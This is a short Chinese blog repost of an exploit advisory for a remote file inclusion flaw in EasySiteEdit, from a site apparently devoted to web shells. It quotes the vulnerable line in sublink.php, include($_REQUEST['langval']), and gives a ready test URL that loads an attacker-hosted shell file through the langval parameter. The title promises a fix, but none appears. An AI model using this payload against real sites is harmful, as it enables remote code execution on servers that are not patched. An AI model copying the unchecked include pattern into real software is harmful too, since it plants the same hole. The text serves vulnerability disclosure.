EasySiteEdit远程文件包含缺陷及修复
Exploit Title: EasySiteEdit remote file include
作者:koskesh jakesh
下载地址: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip
# Tested on: linux
-------------------------------
vul:sublink.php
line 20:
include($_REQUEST['langval']);
-------------------------------
测试:
http://webshell.cc/path/sublink.php?langval=shell.txt?
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/769.html